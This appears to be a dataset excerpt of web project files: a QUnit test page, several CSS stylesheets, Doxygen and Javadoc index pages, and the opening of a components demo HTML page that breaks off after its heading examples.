path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
misago/frontend/test/index.html | kingctan/Misago | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Misago QUnit</title>
<link rel="stylesheet" href="//code.jquery.com/qunit/qunit-1.18.0.css">
<link rel="stylesheet" href="/dist/css/misago.css">
</head>
<body>
<div id="qunit"></div>
<div id="qunit-fixture"></div>
<script src="//code.jquery.com/qunit/qunit-1.18.0.js"></script>
<script src="/dist/js/vendor.js"></script>
<script src="/dist/js/misago.js"></script>
<script src="/dist/utils.js"></script>
<script src="/dist/tests.js"></script>
</body>
</html> |
css/default.css | TSS-GNDU/ignisea | /* General Demo Style *
@import url(http://fonts.googleapis.com/css?family=Lato:300,400,700);
@font-face {
font-family: 'codropsicons';
src:url('../fonts/codropsicons/codropsicons.eot');
src:url('../fonts/codropsicons/codropsicons.eot?#iefix') format('embedded-opentype'),
url('../fonts/codropsicons/codropsicons.woff') format('woff'),
url('../fonts/codropsicons/codropsicons.ttf') format('truetype'),
url('../fonts/codropsicons/codropsicons.svg#codropsicons') format('svg');
font-weight: normal;
font-style: normal;
}
*, *:after, *:before { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; }
body, html { font-size: 100%; padding: 0; margin: 0; }
/* Clearfix hack by Nicolas Gallagher: http://nicolasgallagher.com/micro-clearfix-hack/ */
.clearfix:before, .clearfix:after { content: " "; display: table; }
.clearfix:after { clear: both; }
/*body {
font-family: 'Lato', Calibri, Arial, sans-serif;
color: #fff;
background: #e74c3c;
}
a {
color: #c0392b;
text-decoration: none;
}
a:hover,
a:active {
color: #333;
}
/* Header Style *
.main,
.container > header {
margin: 0 auto;
padding: 2em;
}
.container > header {
text-align: center;
background: #d94839;
padding: 3em;
}
.container > header h1 {
font-size: 2.625em;
line-height: 1.3;
margin: 0;
font-weight: 300;
}
.container > header span {
display: block;
font-size: 60%;
opacity: 0.7;
padding: 0 0 0.6em 0.1em;
}
/* Main Content *
.main {
max-width: 69em;
}
.column {
float: left;
width: 50%;
padding: 0 2em;
min-height: 300px;
position: relative;
}
.column:nth-child(2) {
box-shadow: -1px 0 0 rgba(0,0,0,0.1);
}
.column p {
font-weight: 300;
font-size: 2em;
padding: 0;
margin: 0;
text-align: right;
line-height: 1.5;
}
/* To Navigation Style *
.codrops-top {
background: #fff;
background: rgba(255, 255, 255, 0.2);
text-transform: uppercase;
width: 100%;
font-size: 0.69em;
line-height: 2.2;
}
.codrops-top a {
padding: 0 1em;
letter-spacing: 0.1em;
display: inline-block;
}
.codrops-top a:hover {
color: #e74c3c;
background: rgba(255,255,255,0.6);
}
.codrops-top span.right {
float: right;
}
.codrops-top span.right a {
float: left;
display: block;
}
.codrops-icon:before {
font-family: 'codropsicons';
margin: 0 4px;
speak: none;
font-style: normal;
font-weight: normal;
font-variant: normal;
text-transform: none;
line-height: 1;
-webkit-font-smoothing: antialiased;
}
.codrops-icon-drop:before {
content: "\e001";
}
.codrops-icon-prev:before {
content: "\e004";
}
*/
button {
border: none;
padding: 0.6em 1.2em;
background: #c0392b;
color: #fff;
font-family: 'Lato', Calibri, Arial, sans-serif;
font-size: 1em;
letter-spacing: 1px;
text-transform: uppercase;
cursor: pointer;
display: inline-block;
margin: 3px 2px;
border-radius: 2px;
}
button:hover {
background: #A5281B;
}
@media screen and (max-width: 46.0625em) {
.column {
width: 100%;
min-width: auto;
min-height: auto;
padding: 1em;
}
.column p {
text-align: left;
font-size: 1.5em;
}
.column:nth-child(2) {
box-shadow: 0 -1px 0 rgba(0,0,0,0.1);
}
}
@media screen and (max-width: 25em) {
.codrops-icon span {
display: none;
}
} |
Documentacion/html/classControladores_1_1Geo2UTM_1_1Geo2UTM-members.html | tonihr/pyGeo | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.6"/>
<title>PyGeo: Lista de los miembros</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
$(document).ready(initResizable);
$(window).load(resizeHeight);
</script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">PyGeo
 <span id="projectnumber">1.0.0</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generado por Doxygen 1.8.6 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Buscar');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Página principal</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Clases</span></a></li>
<li><a href="files.html"><span>Archivos</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Buscar" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Lista de clases</span></a></li>
<li><a href="classes.html"><span>Índice de clases</span></a></li>
<li><a href="inherits.html"><span>Jerarquía de la clase</span></a></li>
<li><a href="functions.html"><span>Miembros de las clases</span></a></li>
</ul>
</div>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
<div id="nav-sync" class="sync"></div>
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
$(document).ready(function(){initNavTree('classControladores_1_1Geo2UTM_1_1Geo2UTM.html','');});
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>Todo</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Clases</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Archivos</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Funciones</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Variables</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div class="header">
<div class="headertitle">
<div class="title">Controladores.Geo2UTM.Geo2UTM Lista de los miembros</div> </div>
</div><!--header-->
<div class="contents">
<p>Lista completa de los miembros de <a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a>, incluyendo todos los heredados:</p>
<table class="directory">
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#aa997e448c5175ce48739bc6c8e8b202f">__CargarElipsoides</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a5962411a173dad93094db2c80384673c">__ForzarHuso</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a2f468aeb46b85eacee6a6283fd45552f">__init__</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#adafb169f96bd6d732c7c6eb1c5ca10b6">__msgBoxErr</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span><span class="mlabel">static</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a9834dca1ef40212ff380ebd53d69c3e7">__pkp</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span><span class="mlabel">static</span></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#abc1c7dc585f5b913c7b41f505534c22d">__pN</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span><span class="mlabel">static</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a72a113aa2b7bbca4171d59f287f5bdbf">__pw</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span><span class="mlabel">static</span></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a5029c878b71aa0b9d500e7d3267537fb">__px</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span><span class="mlabel">static</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#ac03ff33f1b773ccef3813290a10c41b1">__py</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span><span class="mlabel">static</span></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a00a6040cace91f137317c368e31dbcaf">__rutaroot</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span><span class="mlabel">static</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a1498ca44cd04408cda1ea37ca999fde9">__setPrecision</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a4b0c2837d7317691630e61186421bd65">__tabChanged</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"><span class="mlabel">private</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a615844a8aff03bc62d8553c4571c505c">AbrirFicheroGeo</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a56db55a9d7bccd84ac3755d5eef296d4">AbrirFicheroUTM</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#ac753f4a6a3e355a4097d53d9a6ba6755">Calcular</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#ac3b7b1ee6b74734ed0a772b4f1b6c8f0">CalcularArchivo</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html#a8c1dc3f37ce50068cc0ff6cab34508dd">launch</a></td><td class="entry"><a class="el" href="classControladores_1_1Geo2UTM_1_1Geo2UTM.html">Controladores.Geo2UTM.Geo2UTM</a></td><td class="entry"></td></tr>
</table></div><!-- contents -->
</div><!-- doc-content -->
<!-- start footer part -->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
<ul>
<li class="footer">Generado el Lunes, 23 de Marzo de 2015 10:57:10 para PyGeo por
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.6 </li>
</ul>
</div>
</body>
</html>
|
Resources/public/css/font-opensans.min.css | sabinus52/OlixAdminBundle | @CHARSET "UTF-8";
@font-face{font-family:'Open Sans';font-style:normal;font-weight:400;src:local('Open Sans'),local('OpenSans'),url(../fonts/open-sans-400.woff) format('woff');}
@font-face{font-family:'Open Sans';font-style:normal;font-weight:600;src:local('Open Sans Semibold'),local('OpenSans-Semibold'),url(../fonts/open-sans-600.woff) format('woff');}
|
index.html | excray/excray.github.io | ---
title: Wide Spaces
layout: home
---
|
formulize-docs/stylesheets/stylesheet.css | wesley1001/formulize | /* http://meyerweb.com/eric/tools/css/reset/
v2.0 | 20110126
License: none (public domain)
*/
html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, img, ins, kbd, q, s, samp,
small, strike, strong, sub, sup, tt, var,
b, u, i, center,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td,
article, aside, canvas, details, embed,
figure, figcaption, footer, header, hgroup,
menu, nav, output, ruby, section, summary,
time, mark, audio, video {
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
vertical-align: baseline;
}
/* HTML5 display-role reset for older browsers */
article, aside, details, figcaption, figure,
footer, header, hgroup, menu, nav, section {
display: block;
}
body {
line-height: 1;
}
ol, ul {
list-style: none;
}
blockquote, q {
quotes: none;
}
blockquote:before, blockquote:after,
q:before, q:after {
content: '';
content: none;
}
table {
border-collapse: collapse;
border-spacing: 0;
}
/* LAYOUT STYLES */
body {
font-size: 1em;
line-height: 1.5;
background: #e7e7e7 url(../images/body-bg.png) 0 0 repeat;
font-family: 'Helvetica Neue', Helvetica, Arial, serif;
text-shadow: 0 1px 0 rgba(255, 255, 255, 0.8);
color: #6d6d6d;
}
a {
color: #d5000d;
}
a:hover {
color: #950009;
}
#main_content a {
text-decoration: underline !important;
}
#main_content a:hover {
text-decoration: none !important;
}
header {
padding-top: 35px;
padding-bottom: 25px;
}
header h1 {
font-family: 'Chivo', 'Helvetica Neue', Helvetica, Arial, serif; font-weight: 900;
letter-spacing: -1px;
font-size: 48px;
color: #303030;
line-height: 1.2;
}
header h2 {
letter-spacing: -1px;
font-size: 24px;
color: #aaa;
font-weight: normal;
line-height: 1.3;
}
#container {
background: transparent url(../images/highlight-bg.jpg) 50% 0 no-repeat;
min-height: 595px;
}
.inner {
width: 920px;
margin: 0 auto;
}
#container .inner img {
max-width: 100%;
}
#downloads {
margin-bottom: 40px;
}
a.button {
-moz-border-radius: 30px;
-webkit-border-radius: 30px;
border-radius: 30px;
border-top: solid 1px #cbcbcb;
border-left: solid 1px #b7b7b7;
border-right: solid 1px #b7b7b7;
border-bottom: solid 1px #b3b3b3;
color: #303030;
line-height: 25px;
font-weight: bold;
font-size: 15px;
padding: 12px 8px 12px 8px;
display: block;
float: left;
width: 179px;
margin-right: 14px;
background: #fdfdfd; /* Old browsers */
background: -moz-linear-gradient(top, #fdfdfd 0%, #f2f2f2 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#fdfdfd), color-stop(100%,#f2f2f2)); /* Chrome,Safari4+ */
background: -webkit-linear-gradient(top, #fdfdfd 0%,#f2f2f2 100%); /* Chrome10+,Safari5.1+ */
background: -o-linear-gradient(top, #fdfdfd 0%,#f2f2f2 100%); /* Opera 11.10+ */
background: -ms-linear-gradient(top, #fdfdfd 0%,#f2f2f2 100%); /* IE10+ */
background: linear-gradient(top, #fdfdfd 0%,#f2f2f2 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fdfdfd', endColorstr='#f2f2f2',GradientType=0 ); /* IE6-9 */
-webkit-box-shadow: 10px 10px 5px #888;
-moz-box-shadow: 10px 10px 5px #888;
box-shadow: 0px 1px 5px #e8e8e8;
}
a.button:hover {
border-top: solid 1px #b7b7b7;
border-left: solid 1px #b3b3b3;
border-right: solid 1px #b3b3b3;
border-bottom: solid 1px #b3b3b3;
background: #fafafa; /* Old browsers */
background: -moz-linear-gradient(top, #fdfdfd 0%, #f6f6f6 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#fdfdfd), color-stop(100%,#f6f6f6)); /* Chrome,Safari4+ */
background: -webkit-linear-gradient(top, #fdfdfd 0%,#f6f6f6 100%); /* Chrome10+,Safari5.1+ */
background: -o-linear-gradient(top, #fdfdfd 0%,#f6f6f6 100%); /* Opera 11.10+ */
background: -ms-linear-gradient(top, #fdfdfd 0%,#f6f6f6 100%); /* IE10+ */
background: linear-gradient(top, #fdfdfd 0%,#f6f6f6, 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fdfdfd', endColorstr='#f6f6f6',GradientType=0 ); /* IE6-9 */
}
a.button span {
padding-left: 50px;
display: block;
height: 23px;
}
#download-zip span {
background: transparent url(../images/zip-icon.png) 12px 50% no-repeat;
}
#download-tar-gz span {
background: transparent url(../images/tar-gz-icon.png) 12px 50% no-repeat;
}
#view-on-github span {
background: transparent url(../images/octocat-icon.png) 12px 50% no-repeat;
}
#view-on-github {
margin-right: 0;
}
code, pre {
font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal;
color: #222;
margin-bottom: 30px;
font-size: 14px;
}
code {
background-color: #f2f2f2;
border: solid 1px #ddd;
padding: 0 3px;
}
pre {
padding: 20px;
background: #303030;
color: #f2f2f2;
text-shadow: none;
overflow: auto;
}
pre code {
color: #f2f2f2;
background-color: #303030;
border: none;
padding: 0;
}
ul, ol, dl {
margin-bottom: 20px;
}
/* COMMON STYLES */
hr {
height: 1px;
line-height: 1px;
margin-top: 1em;
padding-bottom: 1em;
border: none;
background: transparent url('../images/hr.png') 50% 0 no-repeat;
}
strong {
font-weight: bold;
}
em {
font-style: italic;
}
table {
width: 100%;
border: 1px solid #aaaaaa;
}
th {
border: 1px solid #aaaaaa;
padding: 5px;
font-weight: 500;
}
td {
border: 1px solid #aaaaaa;
padding: 5px;
text-align: center;
font-weight: 300;
}
form {
background: #f2f2f2;
padding: 20px;
}
/* GENERAL ELEMENT TYPE STYLES */
h1 {
font-size: 32px;
}
h2 {
font-size: 22px;
font-weight: bold;
color: #303030;
margin-bottom: 8px;
}
h3 {
color: #d5000d;
font-size: 18px;
font-weight: bold;
margin-bottom: 8px;
}
h4 {
font-size: 16px;
color: #303030;
font-weight: bold;
}
h5 {
font-size: 1em;
color: #303030;
}
h6 {
font-size: .8em;
color: #303030;
}
p {
font-weight: 300;
margin-bottom: 20px;
}
a {
text-decoration: none;
}
p a {
font-weight: 400;
}
blockquote {
font-size: 1.6em;
border-left: 10px solid #e9e9e9;
margin-bottom: 20px;
padding: 0 0 0 30px;
}
ul li {
list-style: disc outside;
margin-left: 17px;
padding-left: 3px;
padding-bottom: 10px;
}
ol li {
list-style: decimal outside;
margin-left: 17px;
padding-left: 3px;
padding-bottom: 10px;
}
dl dt {
color: #303030;
}
footer {
background: transparent url('../images/hr.png') 0 0 no-repeat;
margin-top: 40px;
padding-top: 20px;
padding-bottom: 30px;
font-size: 13px;
color: #aaa;
}
footer a {
color: #666;
}
footer a:hover {
color: #444;
}
/* MISC */
.clearfix:after {
clear: both;
content: '.';
display: block;
visibility: hidden;
height: 0;
}
.clearfix {display: inline-block;}
* html .clearfix {height: 1%;}
.clearfix {display: block;}
.header-home {
color: black !important;
}
/* #Media Queries
================================================== */
/* Smaller than standard 960 (devices and browsers) */
@media only screen and (max-width: 959px) {}
/* Tablet Portrait size to standard 960 (devices and browsers) */
@media only screen and (min-width: 768px) and (max-width: 959px) {}
/* All Mobile Sizes (devices and browser) */
@media only screen and (max-width: 767px) {
header {
padding-top: 10px;
padding-bottom: 10px;
}
#downloads {
margin-bottom: 25px;
}
#download-zip, #download-tar-gz {
display: none;
}
.inner {
width: 94%;
margin: 0 auto;
}
}
/* Mobile Landscape Size to Tablet Portrait (devices and browsers) */
@media only screen and (min-width: 480px) and (max-width: 767px) {}
/* Mobile Portrait Size to Mobile Landscape Size (devices and browsers) */
@media only screen and (max-width: 479px) {}
|
aongta_v1.0.0_src/Fuentes y JavaDoc/aon-ui-warehouse/docs/api/allclasses-noframe.html | Esleelkartea/aonGTA | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_06) on Thu Mar 01 17:40:22 CET 2007 -->
<TITLE>
All Classes (aon.ui.warehouse-0.1 API)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="white">
<FONT size="+1" CLASS="FrameHeadingFont">
<B>All Classes</B></FONT>
<BR>
<TABLE BORDER="0" WIDTH="100%" SUMMARY="">
<TR>
<TD NOWRAP><FONT CLASS="FrameItemFont"><A HREF="com/code/aon/ui/warehouse/controller/DeliveryController.html" title="class in com.code.aon.ui.warehouse.controller">DeliveryController</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/DeliveryControllerListener.html" title="class in com.code.aon.ui.warehouse.event">DeliveryControllerListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/controller/DeliveryDetailController.html" title="class in com.code.aon.ui.warehouse.controller">DeliveryDetailController</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/DeliveryDetailControllerListener.html" title="class in com.code.aon.ui.warehouse.event">DeliveryDetailControllerListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/DeliveryDetailListener.html" title="class in com.code.aon.ui.warehouse.event">DeliveryDetailListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/converter/DeliveryStatusConverter.html" title="class in com.code.aon.ui.warehouse.converter">DeliveryStatusConverter</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/DeliveryTargetListener.html" title="class in com.code.aon.ui.warehouse.event">DeliveryTargetListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/DeliveryVetoListener.html" title="class in com.code.aon.ui.warehouse.event">DeliveryVetoListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/controller/IncomeController.html" title="class in com.code.aon.ui.warehouse.controller">IncomeController</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/IncomeControllerListener.html" title="class in com.code.aon.ui.warehouse.event">IncomeControllerListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/controller/IncomeDetailController.html" title="class in com.code.aon.ui.warehouse.controller">IncomeDetailController</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/IncomeDetailControllerListener.html" title="class in com.code.aon.ui.warehouse.event">IncomeDetailControllerListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/IncomeDetailListener.html" title="class in com.code.aon.ui.warehouse.event">IncomeDetailListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/converter/IncomeStatusConverter.html" title="class in com.code.aon.ui.warehouse.converter">IncomeStatusConverter</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/controller/InventoryController.html" title="class in com.code.aon.ui.warehouse.controller">InventoryController</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/InventoryControllerListener.html" title="class in com.code.aon.ui.warehouse.event">InventoryControllerListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/controller/InventoryDetailController.html" title="class in com.code.aon.ui.warehouse.controller">InventoryDetailController</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/event/InventoryDetailControllerListener.html" title="class in com.code.aon.ui.warehouse.event">InventoryDetailControllerListener</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/controller/WarehouseCollectionsController.html" title="class in com.code.aon.ui.warehouse.controller">WarehouseCollectionsController</A>
<BR>
<A HREF="com/code/aon/ui/warehouse/controller/WarehouseController.html" title="class in com.code.aon.ui.warehouse.controller">WarehouseController</A>
<BR>
</FONT></TD>
</TR>
</TABLE>
</BODY>
</HTML>
|
index.html | presskode/components | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="white">
<title>@presskode components</title>
<link href='http://fonts.googleapis.com/css?family=Lato:400,700,400italic' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="css/style.css">
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
<![endif]-->
</head>
<body ontouchstart="">
<div id="menu">
<ul>
<li><a href="#website">element demo</a></li>
<li><a href="http://www.example.net" target="_blank">menus</a></li>
<li><a href="http://www.example.org" target="_blank">blocks</a></li>
<li><a href="http://www.example.biz" target="_blank">images</a></li>
<li><a href="http://www.example.biz" target="_blank">misc</a></li>
<li><a href="http://www.example.co" target="_blank">responsive</a></li>
</ul>
</div>
<div id="website">
<article>
<h1 class="page-title">A bunch of defaults; code for clearness and clarity</h1>
<p>This page displays about every sensible HTML tag you can use.
This HTML has been copied from the starter page of a random Tumblr theme,
edited by <a href="https://twitter.com/presskode" target="_blank">@presskode</a>.
<a href="css/style.css">The (S)CSS</a> has been partially taken by the geniuses who built the WordPress <a href="https://github.com/WordPress/WordPress/blob/master/wp-content/themes/twentyfifteen/style.css" target="_blank">twentyfifteen main stylesheet</a> with some added bits and pieces from <a href="https://github.com/twbs/bootstrap/blob/master/dist/css/bootstrap.css" target="_blank">bootstrap.css</a>, <a href="http://meyerweb.com/eric/tools/css/reset/" target="_blank">Eric Meyer's Reset 2.0</a> and of course my own interpretation of what's clean, good, functional and above all modular code.</p>
<iframe src="https://ghbtns.com/github-btn.html?user=presskode&type=follow&count=false" frameborder="0" scrolling="0" width="150px" height="20px"></iframe> <iframe src="https://ghbtns.com/github-btn.html?user=presskode&repo=components&type=fork&count=false" frameborder="0" scrolling="0" width="90px" height="20px"></iframe>
<hr>
<h1 id="heading1">Heading 1</h1>
<h2 id="heading2">Heading 2</h2>
<h3 id="heading3">Heading 3</h3>
<h4 id="heading4">Heading 4</h4>
<h5 id="heading5">Heading 5</h5>
<h6 id="heading6">Heading 6</h6>
<hr>
